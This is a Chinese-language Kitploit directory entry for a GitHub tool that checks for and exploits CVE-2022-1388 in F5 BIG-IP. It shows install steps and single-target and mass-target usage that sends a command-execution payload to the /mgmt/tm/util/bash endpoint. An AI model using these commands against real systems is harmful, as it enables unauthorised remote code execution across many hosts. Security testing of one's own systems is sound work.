Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-1388 — CVE-2022-1388 工具 | Kitploit
工具/GitHubGitHub/justakazh/cve-2022-1388
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubjustakazh/cve-2022-1388

CVE-2022-1388

CVE-2022-1388 工具

查看仓库
13424年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-1388

CVE-2022-1388 的检查与利用

安装:

root@kitploit:~
python3 -m pip install -r requirements.txt

用法

单个:

root@kitploit:~
python3 cve.py s [fullurl] [api_command]

#example
python3 cve.py s http://127.0.0.1:8000/mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}'

批量:

root@kitploit:~
python3 cve.py m [host list] [endpoint] [api_command] [pool]

#example
python3 cve.py m host.txt /mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}' 10

参考资料:

  • https://github.com/Zeyad-Azima/CVE-2022-1388
  • https://github.com/bandit92/CVE2022-1388_TestAPI
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://www.obrela.com/f5-big-ip-cve-2022-1388-unauthenticated-rce-vulnerability/
下载工具